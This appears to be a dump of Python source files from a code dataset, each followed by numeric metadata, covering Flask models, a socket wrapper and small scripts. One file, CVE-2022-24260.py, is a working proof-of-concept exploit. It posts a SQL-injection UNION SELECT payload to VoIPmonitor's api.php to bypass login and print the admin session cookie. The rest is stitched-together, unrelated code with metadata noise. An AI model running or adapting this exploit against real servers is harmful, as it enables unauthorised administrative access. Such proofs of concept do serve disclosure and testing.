users = db.relationship('User', backref='role', lazy='dynamic')
def __repr__(self):
return '<Role: %s>' % self.name
class Tool(db.Model):
"""
Create a Tool table.
"""
__tablename__ = 'tools'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(60), unique=True)
description = db.Column(db.String(200))
def __repr__(self):
return '<Tool: %s>' % self.name
| 26.278846 | 73 | 0.633004 | 355 | 2,733 | 4.704225 | 0.259155 | 0.095808 | 0.11976 | 0.105389 | 0.435329 | 0.435329 | 0.384431 | 0.31018 | 0.250898 | 0.206587 | 0 | 0.012796 | 0.227955 | 2,733 | 103 | 74 | 26.533981 | 0.778673 | 0.109769 | 0 | 0.269231 | 1 | 0 | 0.064987 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0.173077 | 0.057692 | 0.096154 | 0.903846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
845c9d5b82eb7b3dea40bfa34fdbde156902c9c4 | 58 | py | Python | target365_sdk/__init__.py | paalvibe/sdk-for-python | 382a31c6a8cce87b18160c55ea3db7eb195b7f0d | [
"MIT"
] | null | null | null | target365_sdk/__init__.py | paalvibe/sdk-for-python | 382a31c6a8cce87b18160c55ea3db7eb195b7f0d | [
"MIT"
] | 4 | 2018-10-17T15:50:01.000Z | 2021-01-18T11:09:52.000Z | target365_sdk/__init__.py | paalvibe/sdk-for-python | 382a31c6a8cce87b18160c55ea3db7eb195b7f0d | [
"MIT"
] | 2 | 2019-02-13T09:37:17.000Z | 2020-12-17T16:20:58.000Z | from .api_client import ApiClient
name = "target365_sdk"
| 14.5 | 33 | 0.793103 | 8 | 58 | 5.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.06 | 0.137931 | 58 | 3 | 34 | 19.333333 | 0.82 | 0 | 0 | 0 | 0 | 0 | 0.224138 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
ffc3b12ad1de2efe7c41138fa659445519d83cd1 | 1,682 | py | Python | voip_monitor/CVE-2022-24260.py | tuannm-1876/cybersec-pocs | 05b6e05f830bf3e57907493e7578ffdb243d70b2 | [
"MIT"
] | null | null | null | voip_monitor/CVE-2022-24260.py | tuannm-1876/cybersec-pocs | 05b6e05f830bf3e57907493e7578ffdb243d70b2 | [
"MIT"
] | null | null | null | voip_monitor/CVE-2022-24260.py | tuannm-1876/cybersec-pocs | 05b6e05f830bf3e57907493e7578ffdb243d70b2 | [
"MIT"
] | null | null | null | import requests
import argparse
def parse_args():
parser = argparse.ArgumentParser(prog="python3 CVE-2022-24260.py")
parser.add_argument('-u', '--url', required=True, type=str, default=None)
parser.add_argument('--proxy', required=False, type=str, default=None,
help="Proxy URL, support HTTP proxies (Example: http://127.0.0.1:8080)")
return parser.parse_args()
def exploit(url, proxies):
url = url+"/api.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"}
data = {"module": "relogin", "action": "login", "pass": "nope", "user": "a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #"}
res = requests.post(url, headers=headers, data=data,
proxies=proxies, verify=False)
if ('"success":true' in res.text):
print("Success! Cookie admin is "+res.headers['Set-Cookie'])
else:
print("Not vulnerable")
def main():
args = parse_args()
url = args.url
proxies = {
"http": args.proxy,
"https": args.proxy
}
print(url)
exploit(url, proxies)
main()
| 44.263158 | 560 | 0.661712 | 250 | 1,682 | 4.432 | 0.376 | 0.628159 | 0.920578 | 1.198556 | 0.3213 | 0.3213 | 0.3213 | 0.3213 | 0.3213 | 0.3213 | 0 | 0.035436 | 0.161118 | 1,682 | 37 | 561 | 45.459459 | 0.749823 | 0 | 0 | 0 | 0 | 0.103448 | 0.517241 | 0.294887 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103448 | false | 0.034483 | 0.068966 | 0 | 0.206897 | 0.103448 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
ffdb446710f2a3eb72ed13efcb508d8ac7139504 | 3,251 | py | Python | test/test_dataset.py | joeflack4/pma-api | de213833c93ad0c90b127188526c9eced31edc75 | [
"MIT"
] | 2 | 2018-08-24T14:27:25.000Z | 2020-05-11T18:59:24.000Z | test/test_dataset.py | joeflack4/pma-api | de213833c93ad0c90b127188526c9eced31edc75 | [
"MIT"
] | 36 | 2018-07-13T15:49:50.000Z | 2019-07-17T18:29:28.000Z | test/test_dataset.py | joeflack4/pma-api | de213833c93ad0c90b127188526c9eced31edc75 | [
"MIT"
] | 4 | 2018-07-12T19:24:52.000Z | 2021-03-09T16:08:38.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Unit tests for dataset class."""
# import datetime
# import os
# import unittest
#
# from pma_api import db, create_app
# from pma_api.db_models import Dataset
#
# from .config import TEST_STATIC_DIR
#
#
# # TODO: incomplete
# class TestDataset(unittest.TestCase):
# """Test that the dataset class works.
#
# To run this test directly, issue this command from the root directory:
# python -m test.test_dataset
# """
# file_name = 'api_data-2018.03.19-v29-SAS.xlsx'
#
# def setUp(self):
# """Set up: (1) Put Flask app in test mode, (2) Create temp DB."""
# # Continue from here next time
# # 1 set up the test
# import tempfile
# app = create_app()
# # TODO: Will this work?
# self.db_fd, app.config['DATABASE'] = tempfile.mkstemp()
# app.testing = True
# self.app = app.test_client()
# with app.app_context():
# # 2. new dataset object
# new_dataset = Dataset(
# file_path=TEST_STATIC_DIR + TestDataset.file_name)
# # 3. write to db
# db.session.add(new_dataset)
# db.session.commit()
#
# def test_dataset(self):
# """Create a new entry in 'dataset' table and read data."""
# # 4. read from the db
# dataset_from_db = Dataset.query\
# .filter_by(dataset_display_name=TestDataset.file_name).first()
#
# # 5. make assertions
# self.assertTrue(dataset_from_db.ID != '')
# self.assertTrue(dataset_from_db.data != '')
# self.assertTrue(dataset_from_db.dataset_display_name ==
# 'api_data-2018.03.19-v29-SAS.xlsx')
# self.assertTrue(type(dataset_from_db.upload_date) ==
# datetime.date.today())
# self.assertTrue(dataset_from_db.version_number == 'v29')
# self.assertTrue(dataset_from_db.dataset_type in
# ('data', 'metadata', 'full'))
# self.assertTrue(dataset_from_db.is_active_staging is False)
# self.assertTrue(dataset_from_db.is_active_production is False)
#
# def tearDown(self):
# """Tear down: (1) Close temp DB."""
# # 5: remove the stuff we wrote to the db
# os.close(self.db_fd)
# os.unlink(self.app.config['DATABASE'])
#
#
# # TODO: Use this example from tutorial for the above test
# class TestDB(unittest.TestCase):
# """Test database functionality.
#
# Tutorial: http://flask.pocoo.org/docs/0.12/testing/
# """
#
# def setUp(self):
# """Set up: (1) Put Flask app in test mode, (2) Create temp DB."""
# import tempfile
# from manage import initdb
# self.db_fd, app.config['DATABASE'] = tempfile.mkstemp()
# app.testing = True
# self.app = app.test_client()
# with app.app_context():
# initdb()
#
# def tearDown(self):
# """Tear down: (1) Close temp DB."""
# os.close(self.db_fd)
# os.unlink(app.config['DATABASE'])
#
# def test_empty_db(self):
# """Test empty database."""
# resp = self.app.get('/')
# assert b'No entries here so far' in resp.data
| 34.585106 | 76 | 0.584128 | 412 | 3,251 | 4.466019 | 0.36165 | 0.059783 | 0.063587 | 0.095109 | 0.370109 | 0.326087 | 0.28913 | 0.251087 | 0.225 | 0.155435 | 0 | 0.016674 | 0.280529 | 3,251 | 93 | 77 | 34.956989 | 0.769987 | 0.938788 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0.010753 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
ffee2d2196371e43b7e4f3f6ac529f6f13241b32 | 367 | py | Python | examples/idioms/programs/014.3410-pick-uniformly-a-random-floating-point-number-in-ab.py | laowantong/paroxython | 4626798a60eeaa765dbfab9e63e04030c9fcb1d0 | [
"MIT"
] | 31 | 2020-05-02T13:34:26.000Z | 2021-06-06T17:25:52.000Z | examples/idioms/programs/014.3410-pick-uniformly-a-random-floating-point-number-in-ab.py | laowantong/paroxython | 4626798a60eeaa765dbfab9e63e04030c9fcb1d0 | [
"MIT"
] | 108 | 2019-11-18T19:41:52.000Z | 2022-03-18T13:58:17.000Z | examples/idioms/programs/014.3410-pick-uniformly-a-random-floating-point-number-in-ab.py | laowantong/paroxython | 4626798a60eeaa765dbfab9e63e04030c9fcb1d0 | [
"MIT"
] | 4 | 2020-05-19T08:57:44.000Z | 2020-09-21T08:53:46.000Z | """Pick uniformly a random floating point number in [a..b[.
Pick a random number greater than or equals to _a, strictly inferior to _b. Precondition : _a < _b.
Source: programming-idioms.org
"""
# Implementation author: vinodv
# Created on 2019-09-28T08:37:42.776686Z
# Last modified on 2019-09-28T08:37:42.776686Z
# Version 1
import random
random.uniform(a, b)
| 22.9375 | 99 | 0.743869 | 59 | 367 | 4.559322 | 0.644068 | 0.022305 | 0.05948 | 0.096654 | 0.178439 | 0.178439 | 0.178439 | 0 | 0 | 0 | 0 | 0.131833 | 0.152589 | 367 | 15 | 100 | 24.466667 | 0.733119 | 0.855586 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
080c1c7f009c681e9ecdc451b05cfd6e2d650e7b | 240 | py | Python | lab-523.py | ZaraTam/DAT208x | 21b31d640e1f0e03525c3a18b6ef83a73bf2d644 | [
"MIT"
] | 1 | 2016-06-09T18:54:16.000Z | 2016-06-09T18:54:16.000Z | lab-523.py | ZaraTam/DAT208x | 21b31d640e1f0e03525c3a18b6ef83a73bf2d644 | [
"MIT"
] | null | null | null | lab-523.py | ZaraTam/DAT208x | 21b31d640e1f0e03525c3a18b6ef83a73bf2d644 | [
"MIT"
] | null | null | null | # Histogram of life_exp, 15 bins
plt.hist(life_exp, bins = 15)
# Show and clear plot
plt.show()
plt.clf()
# Histogram of life_exp1950, 15 bins
plt.hist(life_exp1950, bins = 15)
# Show and clear plot again
plt.show()
plt.clf() | 18.461538 | 37 | 0.679167 | 41 | 240 | 3.878049 | 0.365854 | 0.138365 | 0.188679 | 0.163522 | 0.490566 | 0.27673 | 0 | 0 | 0 | 0 | 0 | 0.08377 | 0.204167 | 240 | 13 | 38 | 18.461538 | 0.748691 | 0.4625 | 0 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
f247237cc5bf959380b143e332cc8d0700a94389 | 69 | py | Python | beagle/header/mpu_accel_fsr_t.py | ts03408751/beagle | c9c2d37c081768e3fb6dbd88e563deb168c9e33b | [
"MIT"
] | null | null | null | beagle/header/mpu_accel_fsr_t.py | ts03408751/beagle | c9c2d37c081768e3fb6dbd88e563deb168c9e33b | [
"MIT"
] | null | null | null | beagle/header/mpu_accel_fsr_t.py | ts03408751/beagle | c9c2d37c081768e3fb6dbd88e563deb168c9e33b | [
"MIT"
] | 1 | 2018-10-06T09:01:45.000Z | 2018-10-06T09:01:45.000Z | ACCEL_FSR_2G = 0
ACCEL_FSR_4G = 1
ACCEL_FSR_8G = 2
ACCEL_FSR_16G = 3
| 13.8 | 17 | 0.768116 | 16 | 69 | 2.8125 | 0.625 | 0.711111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 0.173913 | 69 | 4 | 18 | 17.25 | 0.631579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
f25325061d638aec7ce46bbd9c49441abe8fadfc | 160 | py | Python | electricitycostcalculator/__init__.py | LBNL-ETA/elecprice | 911a3799fa3f019b6677741b07545526d1102139 | [
"BSD-3-Clause-LBNL"
] | null | null | null | electricitycostcalculator/__init__.py | LBNL-ETA/elecprice | 911a3799fa3f019b6677741b07545526d1102139 | [
"BSD-3-Clause-LBNL"
] | 1 | 2022-03-31T17:15:12.000Z | 2022-03-31T17:15:12.000Z | electricitycostcalculator/__init__.py | LBNL-ETA/elecprice | 911a3799fa3f019b6677741b07545526d1102139 | [
"BSD-3-Clause-LBNL"
] | null | null | null | __author__ = 'Olivier Van Cutsem'
from electricitycostcalculator import electricity_rate_manager, openei_tariff
__all__ = ["cost_calculator", "openei_tariff"]
| 32 | 77 | 0.83125 | 17 | 160 | 7.058824 | 0.882353 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09375 | 160 | 4 | 78 | 40 | 0.827586 | 0 | 0 | 0 | 0 | 0 | 0.2875 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
f25406747f27d464931ff0855a75d9fdfcf2caf9 | 115 | py | Python | easyci/exit_codes.py | naphatkrit/easyci | 7aee8d7694fe4e2da42ce35b0f700bc840c8b95f | [
"MIT"
] | 2 | 2018-03-26T11:59:22.000Z | 2018-07-08T16:57:58.000Z | easyci/exit_codes.py | naphatkrit/easyci | 7aee8d7694fe4e2da42ce35b0f700bc840c8b95f | [
"MIT"
] | 2 | 2015-08-28T14:50:51.000Z | 2015-08-28T14:51:10.000Z | easyci/exit_codes.py | naphatkrit/easyci | 7aee8d7694fe4e2da42ce35b0f700bc840c8b95f | [
"MIT"
] | null | null | null | SUCCESS = 0
FAILURE = 1 # NOTE: click.abort() uses this
# for when tests are already running
ALREADY_RUNNING = 2
| 19.166667 | 44 | 0.721739 | 18 | 115 | 4.555556 | 0.888889 | 0.341463 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032609 | 0.2 | 115 | 5 | 45 | 23 | 0.858696 | 0.556522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
f25fe7e45a62adb0df44aab8f3b5c12e669c380b | 165 | py | Python | rustls_any_pq.py | thomwiggers/mk-cert | b8e08cf16d01355f648b552e0d7f9c4af627f6bc | [
"CC0-1.0"
] | null | null | null | rustls_any_pq.py | thomwiggers/mk-cert | b8e08cf16d01355f648b552e0d7f9c4af627f6bc | [
"CC0-1.0"
] | null | null | null | rustls_any_pq.py | thomwiggers/mk-cert | b8e08cf16d01355f648b552e0d7f9c4af627f6bc | [
"CC0-1.0"
] | 1 | 2021-11-22T07:15:53.000Z | 2021-11-22T07:15:53.000Z | from encoder import oids, signs, camel_to_snake
for alg in signs:
alg = camel_to_snake(alg).upper()
print(rf"(SignatureScheme::{alg}, &signature::{alg}),")
| 27.5 | 59 | 0.69697 | 24 | 165 | 4.625 | 0.666667 | 0.126126 | 0.216216 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145455 | 165 | 5 | 60 | 33 | 0.787234 | 0 | 0 | 0 | 0 | 0 | 0.266667 | 0.145455 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
f2765ca00f1a8035009ede37810f4a33ddc91693 | 4,459 | py | Python | sliplib/slipsocket.py | samvasko/SlipLib | 090b5e77947f96c28f129ba9beb7da1d8f4855cf | [
"MIT"
] | 1 | 2020-03-04T19:48:26.000Z | 2020-03-04T19:48:26.000Z | sliplib/slipsocket.py | samvasko/SlipLib | 090b5e77947f96c28f129ba9beb7da1d8f4855cf | [
"MIT"
] | null | null | null | sliplib/slipsocket.py | samvasko/SlipLib | 090b5e77947f96c28f129ba9beb7da1d8f4855cf | [
"MIT"
] | null | null | null | # Copyright (c) 2017 Ruud de Jong
# This file is part of the SlipLib project which is released under the MIT license.
# See https://github.com/rhjdjong/SlipLib for details.
import socket
from .slipwrapper import SlipWrapper
class SlipSocket(SlipWrapper):
"""SlipSocket -> Wraps a TCP :class:`socket` with a :class:`Driver`
:class:`SlipSocket` combines a :class:`Driver` instance with a
:class:`socket`.
The :class:`SlipStream` class has all the methods from its base class :class:`SlipWrapper`.
In addition it directly exposes all methods and attributes of
the contained :obj:`socket`, except for the following:
* :meth:`send*` and :meth:`recv*`. These methods are not
supported, because byte-oriented send and receive operations
would invalidate the internal state maintained by :class:`SlipSocket`.
* Similarly, :meth:`makefile` is not supported, because byte- or line-oriented
read and write operations would invalidate the internal state.
* :meth:`share` (Windows only) and :meth:`dup`. The internal state of
the :class:`SlipSocket` would have to be duplicated and shared to make these methods meaningful.
Because of the lack of a convincing use case for this, sharing and duplication is
not supported.
* The :meth:`accept` method is delegated to the contained :class:`socket`,
but the socket that is returned by the :class:`socket`'s :meth:`accept` method
is automatically wrapped in a :class:`SlipSocket` object.
In stead of the :class:`socket`'s :meth:`send*` and :meth:`recv*` methods
a :class:`SlipSocket` provides the method :meth:`send_msg` and :meth:`recv_msg`
to send and receive SLIP-encoded messages.
Only TCP sockets are supported. Using the SLIP protocol on
UDP sockets is not supported for the following reasons:
* UDP is datagram-based. Using SLIP with UDP therefore
introduces ambiguity: should SLIP packets be allowed to span
multiple UDP datagrams or not?
* UDP does not guarantee delivery, and does not guarantee that
datagrams are delivered in the correct order.
"""
_chunk_size = 4096
def __init__(self, sock):
"""
To instantiate a :class:`SlipSocket`, the user must provide
a pre-constructed TCP :class:`socket`.
An alternative way to instantiate s SlipSocket is to use the
class method :meth:`create_connection`.
:param socket.socket sock: an existing TCP socket, i.e.
a socket with type :const:`socket.SOCK_STREAM`
"""
if not isinstance(sock, socket.socket) or sock.type != socket.SOCK_STREAM:
raise ValueError('Only sockets with type SOCK_STREAM are supported')
super().__init__(sock)
self.socket = self.stream
def send_bytes(self, packet):
self.socket.sendall(packet)
def recv_bytes(self):
return self.socket.recv(self._chunk_size)
def accept(self):
conn, address = self.socket.accept()
return self.__class__(conn), address
@property
def family(self):
return self.socket.family
@property
def type(self):
return self.socket.type
@property
def proto(self):
return self.socket.proto
def __getattr__(self, attribute):
if attribute.startswith('recv') or attribute.startswith('send') or attribute in (
'makefile', 'share', 'dup',
):
raise AttributeError("'{}' object has no attribute '{}'".
format(self.__class__.__name__, attribute))
return getattr(self.socket, attribute)
@classmethod
def create_connection(cls, address, timeout=None, source_address=None):
"""Create a SlipSocket connection.
This convenience method creates a connection to the the specified address
using the :func:`socket.create_connection` function.
The socket that is returned from that call is automatically wrapped in
a :class:`SlipSocket` object.
.. note::
The :meth:`create_connection` method does not magically turn the
socket at the remote address into a SlipSocket.
For the connection to work properly,
the remote socket must already
have been configured to use the SLIP protocol.
"""
sock = socket.create_connection(address, timeout, source_address)
return cls(sock)
| 40.171171 | 102 | 0.675264 | 579 | 4,459 | 5.127807 | 0.352332 | 0.040418 | 0.021556 | 0.026945 | 0.09835 | 0.058606 | 0.030987 | 0.030987 | 0 | 0 | 0 | 0.002365 | 0.24131 | 4,459 | 110 | 103 | 40.536364 | 0.875259 | 0.61673 | 0 | 0.083333 | 0 | 0 | 0.073427 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.055556 | 0.111111 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
f2815e2dee9147eca8db7340ee22cdc7998ddcd0 | 561 | py | Python | PyStationB/libraries/GlobalPenalisation/tests/moment_matching/backend_independent/conftest.py | BrunoKM/station-b-libraries | ea3591837e4a33f0bef789d905467754c27913b3 | [
"MIT"
] | 6 | 2021-09-29T15:46:55.000Z | 2021-12-14T18:39:51.000Z | PyStationB/libraries/GlobalPenalisation/tests/moment_matching/backend_independent/conftest.py | BrunoKM/station-b-libraries | ea3591837e4a33f0bef789d905467754c27913b3 | [
"MIT"
] | null | null | null | PyStationB/libraries/GlobalPenalisation/tests/moment_matching/backend_independent/conftest.py | BrunoKM/station-b-libraries | ea3591837e4a33f0bef789d905467754c27913b3 | [
"MIT"
] | 3 | 2021-09-27T10:35:20.000Z | 2021-10-02T17:53:07.000Z | # -------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# -------------------------------------------------------------------------------------------
"""
Set-up for pytest tests. Sorts setting random seeds etc.
"""
import pytest
from jax.config import config
@pytest.fixture(autouse=True, scope="module")
def disable_jit():
config.update("jax_disable_jit", True)
| 37.4 | 93 | 0.502674 | 54 | 561 | 5.166667 | 0.740741 | 0.071685 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101604 | 561 | 14 | 94 | 40.071429 | 0.553571 | 0.69697 | 0 | 0 | 0 | 0 | 0.132075 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
f282405f5c54ff9170da27991eff5b176bfa4210 | 352 | py | Python | dacbench/envs/__init__.py | rishan92/DACBench | bf4e0398110a50ac33c7bc57a13ecca3590e8247 | [
"Apache-2.0"
] | null | null | null | dacbench/envs/__init__.py | rishan92/DACBench | bf4e0398110a50ac33c7bc57a13ecca3590e8247 | [
"Apache-2.0"
] | null | null | null | dacbench/envs/__init__.py | rishan92/DACBench | bf4e0398110a50ac33c7bc57a13ecca3590e8247 | [
"Apache-2.0"
] | null | null | null | from dacbench.envs.luby import LubyEnv, luby_gen
from dacbench.envs.sigmoid import SigmoidEnv
from dacbench.envs.fast_downward import FastDownwardEnv
from dacbench.envs.cma_es import CMAESEnv
from dacbench.envs.modea import ModeaEnv
__all__ = [
"LubyEnv",
"luby_gen",
"SigmoidEnv",
"FastDownwardEnv",
"CMAESEnv",
"ModeaEnv",
]
| 23.466667 | 55 | 0.75 | 42 | 352 | 6.095238 | 0.428571 | 0.234375 | 0.3125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.159091 | 352 | 14 | 56 | 25.142857 | 0.864865 | 0 | 0 | 0 | 0 | 0 | 0.159091 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.384615 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
f2aca91930b3fccd5b8bdb04fc06dc7ab39b4d2a | 52 | py | Python | hello.py | hakjuknu/python-git-practice | 07bc732d2b5bafeb5a25a08ac49ef0b551cc5d88 | [
"MIT"
] | null | null | null | hello.py | hakjuknu/python-git-practice | 07bc732d2b5bafeb5a25a08ac49ef0b551cc5d88 | [
"MIT"
] | null | null | null | hello.py | hakjuknu/python-git-practice | 07bc732d2b5bafeb5a25a08ac49ef0b551cc5d88 | [
"MIT"
] | null | null | null | for i in range(1, 10+1):
print ('hello world.')
| 17.333333 | 26 | 0.576923 | 10 | 52 | 3 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 0.230769 | 52 | 2 | 27 | 26 | 0.65 | 0 | 0 | 0 | 0 | 0 | 0.230769 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
f2ad822ca83c694446eb82c994cd961511a72ac2 | 216 | py | Python | setup.py | drkatnz/CombinedOneClass | 91808693fab8df84862b7f97440a2fc31c5a7a0f | [
"MIT"
] | 5 | 2017-02-21T11:13:59.000Z | 2022-02-05T19:51:30.000Z | setup.py | drkatnz/CombinedOneClass | 91808693fab8df84862b7f97440a2fc31c5a7a0f | [
"MIT"
] | null | null | null | setup.py | drkatnz/CombinedOneClass | 91808693fab8df84862b7f97440a2fc31c5a7a0f | [
"MIT"
] | null | null | null | from distutils.core import setup
setup(
name='CombinedOneClass',
version='0.1dev',
packages=['oneclass','oneclass.generators'],
license='MIT License',
long_description=open('README.md').read(),
) | 24 | 48 | 0.685185 | 24 | 216 | 6.125 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01087 | 0.148148 | 216 | 9 | 49 | 24 | 0.788043 | 0 | 0 | 0 | 0 | 0 | 0.317972 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.125 | 0 | 0.125 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
f2c4909658b8fdbe19bcbfd22c1c7954f7c133b9 | 176 | py | Python | recurdecbin.py | SUBHAROOP/Learning-Python | 83a28a5e71ed3ab33c1510ba90b62559d241039e | [
"MIT"
] | null | null | null | recurdecbin.py | SUBHAROOP/Learning-Python | 83a28a5e71ed3ab33c1510ba90b62559d241039e | [
"MIT"
] | null | null | null | recurdecbin.py | SUBHAROOP/Learning-Python | 83a28a5e71ed3ab33c1510ba90b62559d241039e | [
"MIT"
] | null | null | null | n=int(input("Enter the Decimal Number:"))
def covbin(n):
if(n==0):
return 0
else:
return (n%2)+(10*covbin(n//2))
print("Binary is=",covbin(n))
